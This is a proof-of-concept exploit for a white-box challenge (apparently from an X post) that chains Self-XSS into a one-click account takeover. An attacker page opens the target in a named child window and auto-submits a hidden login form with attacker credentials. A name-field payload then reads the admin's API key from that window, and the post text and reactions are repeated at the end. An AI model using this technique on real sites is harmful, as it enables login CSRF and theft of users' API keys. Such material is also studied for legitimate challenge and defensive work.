HTML_POC_ON_ATTACKER_WEBSITE:
self-xss in name:
https://x.com/yshahinzadeh/status/1911847626472825233?s=61
<!DOCTYPE html>
<html>
<head>
<noscript>attacker website</noscript>
</head>
<body>
<button onclick="run()">click</button>
<form id="myForm" method="POST" action="http://site.com/index.php" style="display:none;">
<input type="hidden" name="username" value="user">
<input type="hidden" name="password" value="pass">
<input type="hidden" name="login" value="">
</form>
<noscript>
function run() {
window.zwin = window.open("http://site.com/index.php", "childWindow", "width=600,height=400");
setTimeout(() => {
document.getElementById("myForm").submit();
}, 3000);
}
</noscript>
</body>
</html>
self-xss in name:
<noscript>zwins = window.open('', 'childWindow'); key = zwins.document.querySelector('.api-key p').textContent; alert(key);</noscript>
https://x.com/yshahinzadeh/status/1911847626472825233?s=61
X (formerly Twitter)
YS (@YShahinzadeh) on X
[white box challenge]
Can you convert the Self-XSS into a 1-click ATO? this challenge is based on a real world bug, a semi-novel way to exploit Self-XSS. challenge objective is to steal admin's API key, give it a shot:
https://t.co/USYCPgX7kr
online instance:…
Can you convert the Self-XSS into a 1-click ATO? this challenge is based on a real world bug, a semi-novel way to exploit Self-XSS. challenge objective is to steal admin's API key, give it a shot:
https://t.co/USYCPgX7kr
online instance:…
👏8👍2
🔥13 3